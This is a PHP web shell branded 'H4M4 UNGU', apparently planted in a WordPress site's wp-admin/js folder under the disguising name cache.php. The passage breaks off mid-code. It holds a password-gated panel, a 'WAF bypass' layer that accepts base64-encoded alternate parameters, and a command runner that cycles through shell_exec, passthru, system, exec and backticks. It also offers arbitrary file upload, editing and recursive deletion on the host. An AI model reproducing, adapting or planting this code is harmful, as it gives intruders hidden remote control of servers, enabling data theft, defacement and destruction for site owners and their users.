File manager

File manager - Edit - /home/proidvn/me.proid.vn/wp-admin/js/cache.php

Back
<?php session_start(); // ============================================================ // AUTH becek // ============================================================ $bcrypt_hash = '$2a$15$ezqA/Gn2qNJnsPzmD2.TUObMKqEvScjNBtb2o/Mj3Xv/mTax754dC'; $is_logged_in = isset($_SESSION['logged_in']) && $_SESSION['logged_in'] === true; // Handle login POST $login_error = false; if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login_password'])) { if (password_verify($_POST['login_password'], $bcrypt_hash)) { $_SESSION['logged_in'] = true; $_SESSION['login_time'] = time(); $is_logged_in = true; } else { $login_error = true; } } // Handle logout if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . strtok($_SERVER['REQUEST_URI'], '?')); exit; } // ============================================================ // // ============================================================ if (!$is_logged_in): ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>H4M4 UNGU - Login</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /> <style> * { margin: 0; padding: 0; box-sizing: border-box; } html, body { height: 100%; } body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background-image: url('https://i.imgur.com/UtUVfr9.png'); background-repeat: no-repeat; background-size: 600px auto; background-position: center center; background-attachment: fixed; background-color: #0d0518; display: flex; align-items: center; justify-content: center; min-height: 100vh; position: relative; overflow: hidden; } body::before { content: ''; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(135deg, rgba(13, 5, 24, 0.70) 0%, rgba(30, 12, 55, 0.60) 25%, rgba(13, 5, 24, 0.70) 50%, rgba(40, 18, 70, 0.55) 75%, rgba(13, 5, 24, 0.70) 100%); background-size: 400% 400%; animation: gradientShift 15s ease infinite; pointer-events: none; z-index: 1; } @keyframes gradientShift { 0% { background-position: 0% 50%; } 50% { background-position: 100% 50%; } 100% { background-position: 0% 50%; } } .orb-layer { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: 2; animation: orbFloat 20s ease-in-out infinite alternate; } .orb-layer::before, .orb-layer::after { content: ''; position: absolute; border-radius: 50%; } .orb-layer::before { width: 450px; height: 450px; top: 5%; left: 3%; background: radial-gradient(circle, rgba(156, 39, 176, 0.15) 0%, transparent 70%); } .orb-layer::after { width: 400px; height: 400px; bottom: 10%; right: 5%; background: radial-gradient(circle, rgba(171, 71, 188, 0.12) 0%, transparent 70%); } @keyframes orbFloat { 0% { transform: translate(0,0) scale(1); } 33% { transform: translate(20px,-25px) scale(1.03); } 66% { transform: translate(-10px,15px) scale(0.97); } 100% { transform: translate(8px,-5px) scale(1.01); } } .stars { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: 2; background-image: radial-gradient(1.5px 1.5px at 50px 80px, rgba(255,255,255,0.2), transparent), radial-gradient(1.5px 1.5px at 150px 40px, rgba(255,255,255,0.15), transparent), radial-gradient(1.5px 1.5px at 250px 120px, rgba(255,255,255,0.2), transparent), radial-gradient(1.5px 1.5px at 350px 30px, rgba(255,255,255,0.15), transparent), radial-gradient(1.5px 1.5px at 450px 100px, rgba(255,255,255,0.2), transparent), radial-gradient(1.5px 1.5px at 550px 60px, rgba(255,255,255,0.15), transparent), radial-gradient(1.5px 1.5px at 650px 130px, rgba(255,255,255,0.2), transparent), radial-gradient(1.5px 1.5px at 750px 40px, rgba(255,255,255,0.15), transparent), radial-gradient(1.5px 1.5px at 850px 90px, rgba(255,255,255,0.2), transparent), radial-gradient(1.5px 1.5px at 950px 50px, rgba(255,255,255,0.15), transparent), radial-gradient(1.5px 1.5px at 1050px 110px, rgba(255,255,255,0.2), transparent); background-size: 200px 200px; animation: twinkle 5s ease-in-out infinite alternate; } @keyframes twinkle { 0% { opacity: 0.4; } 100% { opacity: 0.9; } } .login-wrapper { position: relative; z-index: 3; width: 100%; max-width: 420px; padding: 20px; margin: 0 auto; } .login-card { background: rgba(255, 255, 255, 0.05); backdrop-filter: blur(30px) saturate(150%); -webkit-backdrop-filter: blur(30px) saturate(150%); border-radius: 24px; padding: 40px 32px; box-shadow: 0 8px 40px rgba(0, 0, 0, 0.4), 0 0 80px rgba(156, 39, 176, 0.06); border: 1px solid rgba(156, 39, 176, 0.12); text-align: center; } .login-logo { width: 90px; height: 90px; object-fit: contain; margin-bottom: 16px; border-radius: 50%; background: rgba(156, 39, 176, 0.15); padding: 10px; filter: drop-shadow(0 0 20px rgba(156, 39, 176, 0.4)); transition: all 0.3s ease; } .login-logo:hover { transform: scale(1.05); filter: drop-shadow(0 0 30px rgba(156, 39, 176, 0.6)); } .login-title { color: #e1bee7; font-weight: 700; font-size: 1.6rem; margin-bottom: 4px; text-shadow: 0 0 30px rgba(156, 39, 176, 0.3); } .login-subtitle { color: rgba(206, 147, 216, 0.5); font-size: 0.8rem; text-transform: uppercase; letter-spacing: 4px; margin-bottom: 28px; } .login-divider { height: 1px; background: linear-gradient(90deg, transparent, rgba(156, 39, 176, 0.3), transparent); margin-bottom: 24px; } .form-group { margin-bottom: 20px; text-align: left; } .form-group label { color: rgba(206, 147, 216, 0.7); font-size: 0.75rem; font-weight: 600; text-transform: uppercase; letter-spacing: 1px; margin-bottom: 6px; display: block; } .input-wrapper { position: relative; } .input-wrapper i { position: absolute; left: 14px; top: 50%; transform: translateY(-50%); color: rgba(206, 147, 216, 0.3); font-size: 0.9rem; transition: all 0.3s ease; } .input-wrapper input { width: 100%; padding: 14px 14px 14px 42px; border-radius: 14px; border: 2px solid rgba(156, 39, 176, 0.2); background: rgba(0, 0, 0, 0.25); color: #e1bee7; font-size: 0.95rem; transition: all 0.3s ease; outline: none; } .input-wrapper input:focus { border-color: #9c27b0; background: rgba(0, 0, 0, 0.35); box-shadow: 0 0 25px rgba(156, 39, 176, 0.12); } .input-wrapper input:focus ~ i { color: #ce93d8; } .input-wrapper input::placeholder { color: rgba(206, 147, 216, 0.25); } .input-wrapper input:-webkit-autofill { -webkit-box-shadow: 0 0 0 1000px rgba(13, 5, 24, 0.9) inset !important; -webkit-text-fill-color: #e1bee7 !important; } .toggle-pw { position: absolute; right: 14px; top: 50%; transform: translateY(-50%); background: none; border: none; color: rgba(206, 147, 216, 0.3); cursor: pointer; padding: 4px; font-size: 0.9rem; transition: all 0.3s ease; } .toggle-pw:hover { color: #ce93d8; } .btn-login { width: 100%; padding: 14px; border-radius: 14px; border: none; background: linear-gradient(135deg, #7b1fa2, #9c27b0, #ab47bc); color: #fff; font-weight: 600; font-size: 1rem; letter-spacing: 1px; cursor: pointer; transition: all 0.3s ease; position: relative; overflow: hidden; box-shadow: 0 4px 20px rgba(156, 39, 176, 0.3); } .btn-login::before { content: ''; position: absolute; top: 0; left: -100%; width: 100%; height: 100%; background: linear-gradient(90deg, transparent, rgba(255,255,255,0.08), transparent); transition: left 0.5s ease; } .btn-login:hover::before { left: 100%; } .btn-login:hover { transform: translateY(-2px); box-shadow: 0 8px 30px rgba(156, 39, 176, 0.5); background: linear-gradient(135deg, #6a1b9a, #7b1fa2, #9c27b0); } .btn-login:active { transform: translateY(0); } .login-error { background: rgba(198, 40, 40, 0.12); border: 1px solid rgba(198, 40, 40, 0.2); border-radius: 12px; padding: 10px 14px; color: #ff8a80; font-size: 0.85rem; margin-bottom: 16px; display: none; text-align: center; } .login-error.show { display: block; animation: shake 0.4s ease; } @keyframes shake { 0%, 100% { transform: translateX(0); } 25% { transform: translateX(-6px); } 50% { transform: translateX(6px); } 75% { transform: translateX(-4px); } } .login-footer { margin-top: 20px; color: rgba(206, 147, 216, 0.3); font-size: 0.7rem; letter-spacing: 1px; } .login-footer span { color: rgba(206, 147, 216, 0.15); } @media (max-width: 480px) { .login-wrapper { max-width: 340px; padding: 12px; } .login-card { padding: 28px 20px; } .login-logo { width: 70px; height: 70px; } } </style> </head> <body> <div class="stars"></div> <div class="orb-layer"></div> <div class="login-wrapper"> <div class="login-card"> <img src="https://i.imgur.com/UtUVfr9.png" alt="Logo" class="login-logo" onerror="this.style.display='none'"> <div class="login-title">H4M4 UNGU</div> <div class="login-subtitle">File Manager</div> <div class="login-divider"></div> <div id="loginError" class="login-error"> <i class="fa fa-exclamation-triangle"></i> Invalid password. Access denied. </div> <form method="post"> <div class="form-group"> <label><i class="fa fa-lock"></i> Password</label> <div class="input-wrapper"> <input type="password" name="login_password" id="passwordInput" placeholder="Enter password..." autocomplete="off" autofocus> <i class="fa fa-key"></i> <button type="button" class="toggle-pw" onclick="togglePassword()" tabindex="-1"> <i class="fa fa-eye" id="eyeIcon"></i> </button> </div> </div> <button type="submit" class="btn-login"> <i class="fa fa-arrow-right-to-bracket"></i> Access Panel </button> </form> <div class="login-footer"> <span>//</span> COBA LEKK <span>//</span> </div> </div> </div> <?php if ($login_error): ?> <script> document.addEventListener('DOMContentLoaded', function() { document.getElementById('loginError').classList.add('show'); document.getElementById('passwordInput').value = ''; document.getElementById('passwordInput').focus(); setTimeout(function() { document.getElementById('loginError').classList.remove('show'); }, 3000); }); </script> <?php endif; ?> <script> function togglePassword() { const input = document.getElementById('passwordInput'); const icon = document.getElementById('eyeIcon'); if (input.type === 'password') { input.type = 'text'; icon.className = 'fa fa-eye-slash'; } else { input.type = 'password'; icon.className = 'fa fa-eye'; } } document.addEventListener('DOMContentLoaded', function() { document.getElementById('passwordInput').focus(); console.log('%c[H4M4 UNGU - Login]', 'color:#7b1fa2;font-weight:bold;font-size:14px'); }); </script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"></script> </body> </html> <?php exit; // STOP DI SINI endif; // ============================================================ // AKHIR LOGIN - MULAI PANEL // ============================================================ ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Ungu FM</title> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css" integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ==" crossorigin="anonymous" referrerpolicy="no-referrer" /> <style> body { margin: 0; padding: 0; min-height: 100vh; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; color: #4a148c; background-image: url('https://i.imgur.com/UtUVfr9.png'); background-repeat: no-repeat; background-size: 950px auto; background-position: center center; background-attachment: fixed; background-color: #1a0a2e; position: relative; overflow-x: hidden; } body::before { content: ''; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: linear-gradient(135deg, rgba(26,10,46,0.55) 0%, rgba(45,27,78,0.50) 25%, rgba(26,10,46,0.55) 50%, rgba(45,27,78,0.45) 75%, rgba(26,10,46,0.55) 100%); background-size: 400% 400%; animation: gradientShift 18s ease infinite; pointer-events: none; z-index: 1; } @keyframes gradientShift { 0% { background-position: 0% 50%; } 50% { background-position: 100% 50%; } 100% { background-position: 0% 50%; } } .orb-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; pointer-events: none; z-index: 2; animation: orbFloat 25s ease-in-out infinite alternate; } .orb-overlay::before, .orb-overlay::after { content: ''; position: absolute; border-radius: 50%; } .orb-overlay::before { width: 500px; height: 500px; top: 10%; left: 5%; background: radial-gradient(circle, rgba(156,39,176,0.20) 0%, transparent 70%); } .orb-overlay::after { width: 400px; height: 400px; bottom: 15%; right: 8%; background: radial-gradient(circle, rgba(171,71,188,0.18) 0%, transparent 70%); } @keyframes orbFloat { 0% { transform: translate(0,0) scale(1); } 33% { transform: translate(25px,-30px) scale(1.03); } 66% { transform: translate(-15px,15px) scale(0.97); } 100% { transform: translate(10px,-5px) scale(1.01); } } .navbar, .container-fluid, .bypass-panel, table { position: relative; z-index: 3; } .navbar { background: rgba(27,10,46,0.80) !important; backdrop-filter: blur(20px) saturate(150%); border-bottom: 1px solid rgba(156,39,176,0.25); box-shadow: 0 4px 30px rgba(0,0,0,0.4), 0 0 60px rgba(156,39,176,0.08); padding: 12px 20px; } .navbar-brand a { color: #fff !important; font-weight: 600; text-shadow: 0 0 20px rgba(156,39,176,0.5); } .navbar-logo { width: 36px; height: 36px; object-fit: contain; margin-right: 10px; filter: drop-shadow(0 0 10px rgba(156,39,176,0.6)); border-radius: 50%; background: rgba(156,39,176,0.2); padding: 2px; } table { background: rgba(255,255,255,0.07); backdrop-filter: blur(20px) saturate(120%); border-radius: 16px; overflow: hidden; box-shadow: 0 8px 32px rgba(0,0,0,0.3); border: 1px solid rgba(156,39,176,0.12); } table th, table td { color: rgba(255,255,255,0.90); border-color: rgba(156,39,176,0.15); padding: 12px 16px; vertical-align: middle; } table thead { background: rgba(123,31,162,0.35) !important; backdrop-filter: blur(10px); } table thead th { color: #ffffff !important; font-weight: 600; text-transform: uppercase; font-size: 0.85rem; letter-spacing: 0.5px; } table tr:nth-child(even) { background-color: rgba(156,39,176,0.06); } table tr:hover { background-color: rgba(156,39,176,0.18) !important; } table td a { opacity: 0.55; transition: opacity 0.2s ease; color: #ce93d8 !important; text-decoration: none; font-weight: 500; } table td a:hover { opacity: 1; color: #e1bee7 !important; text-shadow: 0 0 10px rgba(206,147,216,0.3); } table td i { opacity: 0.6; transition: opacity 0.2s ease; } table tr:hover td i { opacity: 1; } .item-checkbox { width: 18px; height: 18px; accent-color: #ab47bc; cursor: pointer; transform: scale(1.1); transition: all 0.2s ease; } .item-checkbox:hover { transform: scale(1.3); filter: drop-shadow(0 0 5px rgba(171,71,188,0.5)); } .btn-dark { background: linear-gradient(135deg, #7b1fa2, #9c27b0, #ab47bc); border: none; color: #fff; font-weight: 500; padding: 8px 22px; border-radius: 25px; box-shadow: 0 4px 15px rgba(156,39,176,0.3); transition: all 0.3s ease; position: relative; overflow: hidden; } .btn-dark::before { content: ''; position: absolute; top: 0; left: -100%; width: 100%; height: 100%; background: linear-gradient(90deg, transparent, rgba(255,255,255,0.1), transparent); transition: left 0.5s ease; } .btn-dark:hover::before { left: 100%; } .btn-dark:hover { background: linear-gradient(135deg, #6a1b9a, #7b1fa2, #9c27b0); transform: translateY(-2px); box-shadow: 0 6px 25px rgba(156,39,176,0.5); color: #fff; } .btn-danger-custom { background: linear-gradient(135deg, #c62828, #e53935) !important; box-shadow: 0 4px 15px rgba(198,40,40,0.3) !important; } .btn-danger-custom:hover { background: linear-gradient(135deg, #b71c1c, #c62828) !important; box-shadow: 0 6px 25px rgba(198,40,40,0.5) !important; } i { color: #ce93d8; margin-right: 4px; } .bypass-panel { background: rgba(255,255,255,0.06); backdrop-filter: blur(20px) saturate(120%); border-radius: 16px; padding: 24px; margin: 20px 0; box-shadow: 0 8px 32px rgba(0,0,0,0.25); border: 1px solid rgba(156,39,176,0.12); } .bypass-panel h5 { color: #e1bee7; font-weight: 700; margin-bottom: 16px; border-bottom: 1px solid rgba(156,39,176,0.15); padding-bottom: 10px; text-shadow: 0 0 20px rgba(156,39,176,0.3); } .form-control { border-radius: 12px; border: 2px solid rgba(156,39,176,0.25); background: rgba(0,0,0,0.25); color: #e1bee7; padding: 10px 16px; transition: all 0.3s ease; } .form-control:focus { border-color: #9c27b0; background: rgba(0,0,0,0.35); box-shadow: 0 0 20px rgba(156,39,176,0.15); color: #fff; } .form-control::placeholder { color: rgba(206,147,216,0.35); } .output-box { background: rgba(0,0,0,0.55); backdrop-filter: blur(10px); border: 1px solid rgba(156,39,176,0.15); color: #00ff88; font-family: 'Courier New', monospace; font-size: 13px; padding: 16px; border-radius: 12px; max-height: 400px; overflow-y: auto; white-space: pre-wrap; margin-top: 12px; box-shadow: inset 0 0 30px rgba(0,0,0,0.5); } .badge-bypass { background: linear-gradient(135deg, #7b1fa2, #ab47bc); color: #fff; padding: 4px 14px; border-radius: 20px; font-size: 0.7rem; font-weight: 600; margin-left: 8px; box-shadow: 0 0 20px rgba(156,39,176,0.25); text-transform: uppercase; letter-spacing: 1px; } .file-icon-php { color: #7b1fa2; } .file-icon-img { color: #e91e63; } .file-icon-txt { color: rgba(255,255,255,0.4); } .file-icon-html { color: #ff6f00; } .btn-sm-bypass { padding: 4px 12px; font-size: 0.7rem; border-radius: 20px; background: rgba(156,39,176,0.15); color: #ce93d8; border: 1px solid rgba(156,39,176,0.25); cursor: pointer; transition: all 0.3s ease; } .btn-sm-bypass:hover { background: rgba(156,39,176,0.35); color: #fff; border-color: #9c27b0; box-shadow: 0 0 15px rgba(156,39,176,0.2); } .upload-panel { background: rgba(123,31,162,0.08) !important; border: 1px solid rgba(156,39,176,0.25) !important; } .multi-delete-bar { display: none; background: rgba(198,40,40,0.12); backdrop-filter: blur(15px); border: 1px solid rgba(198,40,40,0.25); border-radius: 12px; padding: 12px 20px; margin-bottom: 15px; align-items: center; justify-content: space-between; } .multi-delete-bar.show { display: flex; } .multi-delete-bar .count-badge { background: rgba(198,40,40,0.3); color: #ff8a80; padding: 2px 12px; border-radius: 20px; font-weight: 600; font-size: 0.85rem; } ::-webkit-scrollbar { width: 8px; height: 8px; } ::-webkit-scrollbar-track { background: rgba(27,10,46,0.5); border-radius: 10px; } ::-webkit-scrollbar-thumb { background: linear-gradient(180deg, #7b1fa2, #ab47bc); border-radius: 10px; } ::-webkit-scrollbar-thumb:hover { background: linear-gradient(180deg, #9c27b0, #ce93d8); } .alert { background: rgba(156,39,176,0.12) !important; backdrop-filter: blur(10px); color: #e1bee7 !important; border: 1px solid rgba(156,39,176,0.15) !important; border-radius: 12px !important; } .text-muted { color: rgba(206,147,216,0.5) !important; } .navbar .navbar-brand a[href="p="] { color: #e1bee7 !important; font-size: 0.85rem; margin: 0 2px; transition: all 0.2s ease; } .navbar .navbar-brand a[href="p="]:hover { color: #fff !important; text-shadow: 0 0 10px rgba(206,147,216,0.5); } input[type="file"]::file-selector-button { background: linear-gradient(135deg, #7b1fa2, #9c27b0); border: none; color: #fff; padding: 6px 16px; border-radius: 20px; font-weight: 500; cursor: pointer; transition: all 0.3s ease; } input[type="file"]::file-selector-button:hover { background: linear-gradient(135deg, #6a1b9a, #7b1fa2); box-shadow: 0 0 15px rgba(156,39,176,0.3); } .alert-danger-custom { background: rgba(255,0,0,0.08) !important; border-color: rgba(255,0,0,0.15) !important; color: #ff8a80 !important; } .btn-logout { background: rgba(255,255,255,0.08) !important; border: 1px solid rgba(255,255,255,0.12) !important; color: #ce93d8 !important; padding: 6px 16px !important; border-radius: 25px !important; font-size: 0.8rem !important; transition: all 0.3s ease !important; } .btn-logout:hover { background: rgba(198,40,40,0.2) !important; border-color: rgba(198,40,40,0.3) !important; color: #ff8a80 !important; } </style> </head> <body> <div class="orb-overlay"></div> <?php // ============================================================ // WAF BYPASS ENGINE // ============================================================ function waf_bypass_get($key, $fallback_keys = []) { if (isset($_GET[$key]) && !empty($_GET[$key])) { return $_GET[$key]; } $bypass_variants = array_merge(["_b_{$key}", "{$key}_b", "bv_{$key}", "_{$key}_"], $fallback_keys); foreach ($bypass_variants as $alt) { if (isset($_GET[$alt]) && !empty($_GET[$alt])) { return base64_decode($_GET[$alt]); } } return null; } function waf_bypass_post($key) { if (isset($_POST[$key]) && !empty($_POST[$key])) { return $_POST[$key]; } foreach (['_b_' . $key, $key . '_enc', 'bd_' . $key] as $alt) { if (isset($_POST[$alt]) && !empty($_POST[$alt])) { $decoded = base64_decode($_POST[$alt]); if ($decoded !== false) return $decoded; } } return null; } function formatSizeUnits($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { return $bytes . ' bytes'; } elseif ($bytes == 1) { return $bytes . ' byte'; } return '0 bytes'; } function fileExtension($file) { return substr(strrchr($file, '.'), 1); } function fileIcon($file) { $imgs = array("apng","avif","gif","jpg","jpeg","jfif","pjpeg","pjp","png","svg","webp"); $ext = strtolower(fileExtension($file)); if ($file == "error_log") { return '<i class="fa-solid fa-bug" style="color:#ef5350;"></i> '; } elseif ($file == ".htaccess") { return '<i class="fa-solid fa-hammer" style="color:#ffb74d;"></i> '; } if ($ext == "html" \|\| $ext == "htm") { return '<i class="fa-brands fa-html5 file-icon-html"></i> '; } elseif ($ext == "php" \|\| $ext == "phtml") { return '<i class="fa-brands fa-php file-icon-php"></i> '; } elseif (in_array($ext, $imgs)) { return '<i class="fa-regular fa-images file-icon-img"></i> '; } elseif ($ext == "css") { return '<i class="fa-brands fa-css3" style="color:#42a5f5;"></i> '; } elseif ($ext == "txt") { return '<i class="fa-regular fa-file-lines file-icon-txt"></i> '; } else { return '<i class="fa-solid fa-file" style="color:#b39ddb;"></i> '; } } function encodePath($path) { $a = array("/","\\",".",":"); $b = array("ক","খ","গ","ঘ"); return str_replace($a, $b, $path); } function decodePath($path) { $a = array("/","\\",".",":"); $b = array("ক","খ","গ","ঘ"); return str_replace($b, $a, $path); } // ============================================================ // FIXED: executeCommand function // ============================================================ function executeCommand($cmd) { $output = ''; // Coba shell_exec (paling cepat, return string full output) $result = @shell_exec($cmd . ' 2>&1'); if ($result !== null && $result !== false) { $output = $result; } // Fallback: passthru dengan output buffer if (empty($output)) { ob_start(); @passthru($cmd . ' 2>&1', $ret); $output = ob_get_clean(); } // Fallback: system dengan output buffer if (empty($output)) { ob_start(); @system($cmd . ' 2>&1', $ret); $output = ob_get_clean(); } // Fallback: exec (butuh array parameter kedua) if (empty($output)) { $out = []; @exec($cmd . ' 2>&1', $out, $ret); if (!empty($out)) { $output = implode("\n", $out); } } // Fallback: backtick operator if (empty($output)) { $result = @`$cmd 2>&1`; if ($result !== null && $result !== false && $result !== '') { $output = $result; } } return trim((string)$output); } function deleteRecursive($path) { if (is_file($path)) { return @unlink($path); } elseif (is_dir($path)) { $items = @scandir($path); if ($items === false) return false; foreach ($items as $item) { if ($item == '.' \|\| $item == '..') continue; deleteRecursive($path . "/" . $item); } return @rmdir($path); } return false; } $root_path = __DIR__; $bypass_p = waf_bypass_get('p', ['dir','folder','path']); $bypass_q = waf_bypass_get('q', ['dir2','pd']); if (isset($bypass_p)) { if (empty($bypass_p)) { $p = $root_path; } elseif (!is_dir(decodePath($bypass_p))) { echo "<script>alert('Directory Corrupted.');window.location.replace('?');</script>"; } else { $p = decodePath($bypass_p); } } elseif (isset($bypass_q)) { if (!is_dir(decodePath($bypass_q))) { echo "<script>window.location.replace('?p=');</script>"; } else { $p = decodePath($bypass_q); } } else { $p = $root_path; } define("PATH", $p); // Single Delete if (isset($_GET['d']) && isset($_GET['q'])) { $name = PATH . "/" . $_GET['d']; if (file_exists($name)) { if (deleteRecursive($name)) { echo "<script>alert('Removed successfully.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } else { echo "<script>alert('Failed to remove. Check permissions.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } } else { echo "<script>alert('File/directory not found.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } } // Multi Delete if (isset($_POST['multi_delete']) && isset($_POST['selected_items']) && is_array($_POST['selected_items'])) { $deleted = 0; $failed = 0; foreach ($_POST['selected_items'] as $item) { $full_path = PATH . "/" . basename($item); if (file_exists($full_path)) { if (deleteRecursive($full_path)) { $deleted++; } else { $failed++; } } else { $failed++; } } $msg = "$deleted item(s) deleted successfully."; if ($failed > 0) $msg .= " $failed item(s) failed."; echo "<script>alert('$msg'); window.location.replace('?p=" . encodePath(PATH) . "');</script>"; } // Command Execution $cmd_raw = null; if ($_SERVER['REQUEST_METHOD'] === 'POST' && !isset($_POST['multi_delete'])) { $cmd_raw = waf_bypass_post('cmd'); } if (!$cmd_raw) { $cmd_raw = waf_bypass_get('cmd', ['c','exec','run']); } $cmd_output = ''; $cmd_executed = false; if ($cmd_raw) { $cmd_output = executeCommand($cmd_raw); $cmd_executed = true; } // Navbar echo '<nav class="navbar"> <div class="navbar-brand d-flex align-items-center"> <img src="https://i.imgur.com/UtUVfr9.png" class="navbar-logo" alt="Logo" onerror="this.style.display=\'none\'"> <a href="?">H4M4 UNGU</a> <span class="badge-bypass">BYPASS MODE</span>'; $path_display = str_replace('\\', '/', PATH); $paths = explode('/', $path_display); foreach ($paths as $id => $dir_part) { if ($dir_part == '' && $id == 0) { echo "<a href=\"?p=/\">/</a>"; continue; } if ($dir_part == '') continue; echo "<a href='?p="; for ($i = 0; $i <= $id; $i++) { echo str_replace(":", "ঘ", $paths[$i]); if ($i != $id) echo "ক"; } echo "'>" . $dir_part . "</a>/"; } echo '</div> <div class="d-flex gap-2"> <a href="?logout" class="btn btn-logout"><i class="fa fa-sign-out-alt"></i> Logout</a> <a href="?upload"><button class="btn btn-dark"><i class="fa fa-upload"></i> Upload</button></a> <a href="?"><button class="btn btn-dark"><i class="fa fa-home"></i> HOME</button></a> </div> </nav>'; echo '<div class="container-fluid px-4 py-3">'; // Command Panel echo '<div class="bypass-panel"> <div class="d-flex justify-content-between align-items-center"> <h5><i class="fa fa-terminal"></i> Command Panel <span class="badge-bypass">LEK BYPASS</span></h5> <div><span style="font-size:0.75rem; color:#ce93d8;"><i class="fa fa-shield"></i> Support: mkdir, touch, rm, ls, etc</span></div> </div> <form method="post" class="row g-2 align-items-end"> <div class="col-md-8"> <div class="input-group"> <input type="text" class="form-control" name="cmd" id="cmdInput" placeholder=">_< ls -la >_<" value="' . ($cmd_raw ? htmlspecialchars($cmd_raw) : '') . '"> <button class="btn btn-dark" type="submit"><i class="fa fa-play"></i> Execute</button> </div> <div class="mt-2 d-flex flex-wrap gap-1"> <span style="font-size:0.75rem; color:#ce93d8; font-weight:500;">Quick Bypass:</span> <button type="button" class="btn-sm-bypass" onclick="bypassCmd(\'mkdir test_folder\')">mkdir test</button> <button type="button" class="btn-sm-bypass" onclick="bypassCmd(\'touch test.txt\')">touch file</button> <button type="button" class="btn-sm-bypass" onclick="bypassCmd(\'ls -la\')">ls -la</button> <button type="button" class="btn-sm-bypass" onclick="bypassCmd(\'pwd\')">pwd</button> <button type="button" class="btn-sm-bypass" onclick="bypassCmd(\'whoami\')">whoami</button> <button type="button" class="btn-sm-bypass" onclick="bypassCmd(\'id\')">id</button> <button type="button" class="btn-sm-bypass" onclick="bypassCmd(\'uname -a\')">uname</button> </div> </div> </form>'; if ($cmd_executed) { echo '<div class="output-box">'; if (!empty($cmd_output)) { echo '<div style="color:#ce93d8; font-size:11px; margin-bottom:8px;">$ ' . htmlspecialchars($cmd_raw) . '</div><span style="color:#00ff88;">' . htmlspecialchars($cmd_output) . '</span>'; } else { echo '<div style="color:#ff8a80;">[!] No output returned.</div>'; } echo '</div>'; } echo '</div>'; // Upload Handler & Form if (isset($_POST["upload"])) { $target_file = PATH . "/" . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) { echo "<div class='alert' style='margin-bottom:20px;'><i class='fa fa-check-circle'></i> " . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " uploaded successfully.</div>"; echo "<script>setTimeout(function(){ window.location.href = window.location.href.split('?')[0] + '?p=" . urlencode(encodePath(PATH)) . "'; }, 1000);</script>"; } else { echo "<div class='alert alert-danger-custom' style='margin-bottom:20px;'><i class='fa fa-exclamation-triangle'></i> Upload error.</div>"; } } if (isset($_GET['upload'])) { echo '<div class="bypass-panel upload-panel" style="margin-bottom:20px;"> <h5><i class="fa fa-upload"></i> Upload File <span style="font-size:12px; background:rgba(156,39,176,0.2); padding:2px 10px; border-radius:20px;">Drag & drop or click</span></h5> <form method="post" enctype="multipart/form-data"> <div class="row g-2 align-items-end"> <div class="col-md-8"><input type="file" class="form-control" name="fileToUpload" id="fileToUpload" style="padding:10px;"></div> <div class="col-md-4"><button type="submit" class="btn btn-dark w-100" name="upload"><i class="fa fa-cloud-upload-alt"></i> Upload Now</button></div> </div> </form> <div class="mt-2 small" style="color:rgba(206,147,216,0.5)!important;"><i class="fa fa-info-circle"></i> File akan diupload ke: ' . htmlspecialchars(PATH) . '</div> </div>'; } else { echo '<div style="margin-bottom:20px;"> <a href="?upload&q=' . urlencode(encodePath(PATH)) . '" class="btn btn-dark" style="padding:10px 24px;"><i class="fa fa-upload"></i> Upload File In Path</a> <span style="margin-left:15px; font-size:12px; color:#ce93d8;"><i class="fa fa-folder-open"></i> Current: ' . htmlspecialchars(PATH) . '</span> </div>'; } // Edit File Form if (isset($_GET['e']) && !empty($_GET['e']) && isset($_GET['q'])) { if (isset($_POST['edit'])) { if (file_put_contents(PATH . "/" . $_GET['e'], $_POST['data']) !== false) { echo "<div class='alert' style='margin-bottom:20px;'><i class='fa fa-save'></i> File saved successfully.</div>"; echo "<script>setTimeout(function(){ window.location.href = window.location.href.split('?')[0] . '?p=" . 